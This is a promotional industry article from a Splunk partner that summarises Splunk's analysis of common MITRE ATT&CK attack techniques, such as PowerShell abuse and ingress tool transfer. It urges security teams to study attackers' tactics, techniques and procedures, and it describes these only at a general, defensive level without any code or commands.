Cybercrime numbers are alarming. According to data management firm Splunk, 65% of organisations reported an increase in cyberattack attempts during 2022, and 49% have suffered a data breach since 2020 — a 10% leap. Though it can seem as if we’re losing the war against online criminals, this isn’t a one-sided confrontation.

Several reports note a reduction in successful breaches, and ransomware gangs took in less money during 2022 because companies are more reluctant to pay. It’s not enough to declare victory, but cybercrime stats no longer go in one direction, thanks to the industry educating people and businesses and adopting more sophisticated cybersecurity technologies.

Yet if security, data and risk teams are not careful, they might lose this advantage. A new analysis by Splunk, delving into the findings of several respected threat reports, reveals that the most popular attacks are often still among the simplest. Rather than only focusing on the latest security tech, enterprise teams should take advantage of shared intelligence and understand TTPs, or tactics, techniques and procedures.

This approach will help them thwart the most obvious attacks that tend to go under the radar, even in sophisticated cybersecurity estates, says Alan Browning, GM at Digital Resilience Insight, a Splunk partner:

“The Splunk report is an opportune reminder that only a small group of cybercriminals use the latest and most sophisticated techniques. Most will go for tested techniques, especially when those might be ignored by security teams looking at newer threats. But the real benefit of using this information and the ATT&CK knowledge base is that teams can predict and preempt these attacks and put proactive safeguards in place.”

Means of ATT&CK

Browning refers to MITRE ATT&CK, a knowledge base of adversary tactics and techniques. Splunk used ATT&CK data as part of its analysis, identifying the most common attack types based on real-world observations.

In Splunk’s analysis, four activities bubbled up as the most common:

PowerShell command and scripting interpreter: Criminals abuse the powerful Microsoft PowerShell command-line system for various tasks, such as discovery and executing code.
Obfuscated files or information: Criminals hide executables and other files from discovery by using encryption, compression and other methods.
Ingress tool transfer: Once they gain a foothold, criminals transfer tools and files from an external system into a compromised system.
System service execution: Criminals abuse system services or daemons to launch commands or programs, often at boot but also during other periods.

These four are the most common, but Splunk lists several more important avenues of attack, including file and directory discovery, exploiting public-facing applications, and external remote services. Yet the overarching point is that these are known and obvious methods used by online criminals, and studying their TTPs will guide security teams to reinforce their environments.

Know your TTPs

Tactics, techniques and procedures are very important, not the least because it’s the criminals who tell us about them, says Browning.

“You’d think the bad guys would be stealthy and the good guys would work together. But it’s almost the opposite. While security people don’t share as much intelligence and knowledge as they could, adversaries love to share new and reliable attack methods with others on forums and such places. Between collecting attack data and reading what those guys post, we have access to excellent shared intelligence on what attacks to look for.”

The anatomy of an attack can split into TTPs:

Tactics are how online criminals carry out an attack, such as accessing data or moving around a network.
Techniques are their general methods, such as installing malware or running unauthorised database commands — tactics usually consist of several techniques.
Procedures are the granular steps of techniques. For example, crafting and deploying a phishing e-mail to deliver malicious software.

Security teams gain a significant advantage when they focus on popular attack methods and study their TTPs. While adopting the latest security measures is imperative, the fundamentals of comprehensive security come from understanding and preempting common attacks.

“Good security is about risk management,” says Browning. “Where are your risks and how do you mitigate against them? The downside is that the people who create those risks are very adversarial and constantly changing. But the upside is that they also want low risk and high reward, so they often go for proven tactics. Splunk’s analysis clearly shows this effect. I think it’s very important that security teams make TTP studies a part of their strategy, and that they use security providers that take the concept seriously.”

For more information, connect with Digital Resilience Insight on LinkedIn, or contact GM Alan Browning.

About Digital Resilience Insight
Digital Resilience Insight is a leading provider of data security solutions for businesses and organisations of all sizes. With its cutting-edge technology and knowledgeable team, the company is committed to helping its customers protect their sensitive information.